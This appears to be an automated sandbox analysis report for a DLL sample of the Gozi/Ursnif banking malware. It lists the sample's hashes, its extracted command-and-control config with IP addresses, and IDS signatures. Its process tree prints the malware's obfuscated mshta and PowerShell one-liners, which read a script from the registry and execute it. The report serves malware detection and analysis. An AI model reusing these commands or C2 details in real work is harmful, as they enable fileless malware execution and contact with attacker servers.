Analysis
-
max time kernel
234s -
max time network
235s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-07-2022 10:32
Static task
static1
Behavioral task
behavioral1
Sample
62c6b5af0566b.dll
Resource
win7-20220414-en
General
-
Target
62c6b5af0566b.dll
-
Size
432KB
-
MD5
82186dbbba674eaeed2b4bb95a5a9fac
-
SHA1
00d0e69a746d05039b63fdd94eb2bce6ce27a4a7
-
SHA256
251b7936786ed9284ce06582007fe75c3bc301fd0f1060fa53e71e54aff28a7f
-
SHA512
91ba44bf86c583ae28a09c20bebd7b6a9d253e690ce3f358b669d48d17980f0a9b7a40acaa9325f773504bb98edcc9e8edd252716628dd7a79e5394e06d782b4
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
79.110.52.164
79.110.52.97
-
base_path
/drew/
-
build
250239
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Signatures
-
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
-
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 30 3056 rundll32.exe 69 3056 rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 3056 rundll32.exe 3056 rundll32.exe 1596 powershell.exe 1596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1596 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
rundll32.exemshta.exepowershell.execsc.execsc.exedescription pid process target process PID 3372 wrote to memory of 3056 3372 rundll32.exe rundll32.exe PID 3372 wrote to memory of 3056 3372 rundll32.exe rundll32.exe PID 3372 wrote to memory of 3056 3372 rundll32.exe rundll32.exe PID 3904 wrote to memory of 1596 3904 mshta.exe powershell.exe PID 3904 wrote to memory of 1596 3904 mshta.exe powershell.exe PID 1596 wrote to memory of 1428 1596 powershell.exe csc.exe PID 1596 wrote to memory of 1428 1596 powershell.exe csc.exe PID 1428 wrote to memory of 2240 1428 csc.exe cvtres.exe PID 1428 wrote to memory of 2240 1428 csc.exe cvtres.exe PID 1596 wrote to memory of 2372 1596 powershell.exe csc.exe PID 1596 wrote to memory of 2372 1596 powershell.exe csc.exe PID 2372 wrote to memory of 1912 2372 csc.exe cvtres.exe PID 2372 wrote to memory of 1912 2372 csc.exe cvtres.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\62c6b5af0566b.dll,#12⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Rbvu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rbvu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C012F697-1F67-F289-A9F4-C346ED68A7DA\\\DriverUrls'));if(!window.flag)close()</script>"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wukqui -value gp; new-alias -name embhyopb -value iex; embhyopb ([System.Text.Encoding]::ASCII.GetString((wukqui "HKCU:Software\AppDataLow\Software\Microsoft\C012F697-1F67-F289-A9F4-C346ED68A7DA").CollectByte))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF34F.tmp" "c:\Users\Admin\AppData\Local\Temp\z0024kvt\CSCBAFBBC4C84C429C855DF86DB8C255F5.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF497.tmp" "c:\Users\Admin\AppData\Local\Temp\4umy5urv\CSCF166E4CE9AF34A388A4C98E3C227F91.TMP"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.dllFilesize
3KB
MD52b52edb986645f7b4269715140b51a21
SHA1623b5d04e2bdf086214196d506bd9f0107506d73
SHA2569cc0372f7496e44d5319b56d7faa8f887a9c6d1d0591befcddabd9d87d8a0fa7
SHA5124b84a0d9d7821c7d7e501da2f29b553f70708a6cab66924e4cecb00fe7f0eb7921d31dd84057021338b593f1c391c692ebd87e96df0c9f36b8ab740896e8dde0
-
C:\Users\Admin\AppData\Local\Temp\RESF34F.tmpFilesize
1KB
MD5e4a8fd6ef55f2f2b75d6ba4337434cd9
SHA1f9ff7e010f6a9fa7104638aca0fa2ac3512a4ece
SHA256294b0f90ceb07b43a462586547425ec03f0e727c672058f54bd3df7dacdc5157
SHA512b20775027416cbbad6a0f8cbc40a24135cf974797306811c9e3ffaf19bb2f767bea0232f9f2a36b638ddc855ca2771ce2344279594c32e61caacadb3c4590498
-
C:\Users\Admin\AppData\Local\Temp\RESF497.tmpFilesize
1KB
MD5c5d452c5e3cfaf68ade969d144385e1e
SHA17a1f91c494f397a127a5b835188af4568000499a
SHA256165cdef31cf4d6f4092ccc41f7ac46eabeb1485854b9777306e4a66d12b23685
SHA5126b5fb834eba72cd860cc85c7b7cf74fe7af83898c36cd82bcab1d5efe23b33b64bd88294ba474be6543964d734461ba134b7b1bf96c0fe2d3a244d966af6a02c
-
C:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.dllFilesize
3KB
MD59ccf3382bd0d89e8a4a9b29ad62c222a
SHA1c1973b6822718f9eb0f2cdd8755c2b20ad9db164
SHA2568b2feeae2a082e3b2072a0942e1f64c705e36c5862ebca0d51b60238d1e35984
SHA5129ff50df00151da582e49a2417573b2428544e11acc440ef91a78aee3d2451a195d1102f23396ae5110b1e11812fa618526c9ba5945fb4cf1ed8977718eec7a10
-
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.0.csFilesize
397B
MD5d8855d5c9ffd303a8745198463f233c9
SHA152682118273b0c4c1815184cb321b6e338dd1497
SHA2564b78635784aa51a597ace0766ad21d14851a9a56f551d9768f766c90c4ae299c
SHA5123bde559ee53be9e9497e6dcd3575a423cf43a4426b9e2e4c80f227808008d59174d3db917b80979b63f419a3a23aad6bcc52c70187d9391a5ba5ec2c0637ecb1
-
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\4umy5urv.cmdlineFilesize
369B
MD51b6a559a42a96aafb5919be9f4f6fc2b
SHA13c42c37005e22c1cf2cbe9f7ac191f3bbf2a47e9
SHA2565145838ac610c3ba271e5896afe34a08b995b35b4510866a04c90d82d9f8d10c
SHA5123cd9d8015767ca58cb363e39e1eda4599231eb7f60ba30b1d2a7d6df4f1e5402a3a0e1c83ae49eee499ccabc0e645fb610366da5e1ebfa04157203b8d67f087c
-
\??\c:\Users\Admin\AppData\Local\Temp\4umy5urv\CSCF166E4CE9AF34A388A4C98E3C227F91.TMPFilesize
652B
MD50024bd6774e2018c9e7a455e25357e28
SHA179b0395e549568fd7e5cb4e60ccdb300e4203aaa
SHA2560d8711b8344eebd90dfc8d675faeac5018458f42f2d5d056c6f976b978421d5f
SHA512f70a08bd65474b9ec1d93ab8316f036443e1700585cfa376c21f27a6df3adeafb97cabf5c8fc373b3a1b9899512d22f4c38c1243e7a246622289196a31b91340
-
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\CSCBAFBBC4C84C429C855DF86DB8C255F5.TMPFilesize
652B
MD5e805fb066fea2c14ef2f4f37c740342c
SHA1e9e82217aeb9e05f76242a3d264c0de8c13da7df
SHA25696011d02e3593f17b8ab8720637bb1ba1d9de23b38b59898d87da104db5943a6
SHA5125ab46578986f486d737a4d1c7ebdb27e9a10681de4cff3fe313e670c93de571f001837ae6fb14fcc315f1c9dd64240a8b7096274a4a7d2e103ac0b6aef41ec2e
-
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.0.csFilesize
398B
MD5ea3e12ea1d866ba60cf2b75c9e4081cf
SHA1369b0cba527ffd1adff2b6f5cbd9d7aac6c5e1d0
SHA2568c277a1c32a25738fedea241a8dc31e9e50d19dbe01185daacccec8f4b022442
SHA512a85410b2f4554f3e4765f142ee99f74464f76cf90e25b13686c36f57c6cbfab29d3a1fdcaf5ffd06ff9280ea81eecc3d5db278dbd366d05ce4ab6794a60b8367
-
\??\c:\Users\Admin\AppData\Local\Temp\z0024kvt\z0024kvt.cmdlineFilesize
369B
MD5e898a7cb5154b3068a7d4820f6ee5a27
SHA19370f8bdd4c92a02128b3772323614ef159f85e5
SHA2566db4958cd4d288c7188c12cd3029a712e9ede607633ad35bfc05e5c8024b99c4
SHA512ea8fb70c632c838e0bb22aae50c2d7ba0a05dce9ef478b395fefbf7376a727f4c0900aadbfb9935d8d9960d470ed39ebea5aa86f75b60bbf37b4a8198f6c38f9
-
memory/1428-141-0x0000000000000000-mapping.dmp
-
memory/1596-139-0x0000016D2B4F0000-0x0000016D2B512000-memory.dmpFilesize
136KB
-
memory/1596-140-0x00007FFD4F610000-0x00007FFD500D1000-memory.dmpFilesize
10.8MB
-
memory/1596-138-0x0000000000000000-mapping.dmp
-
memory/1912-151-0x0000000000000000-mapping.dmp
-
memory/2240-144-0x0000000000000000-mapping.dmp
-
memory/2372-148-0x0000000000000000-mapping.dmp
-
memory/3056-130-0x0000000000000000-mapping.dmp
-
memory/3056-134-0x0000000002840000-0x000000000284D000-memory.dmpFilesize
52KB
-
memory/3056-133-0x0000000000A60000-0x0000000000A66000-memory.dmpFilesize
24KB
-
memory/3056-131-0x0000000000400000-0x000000000046E000-memory.dmpFilesize
440KB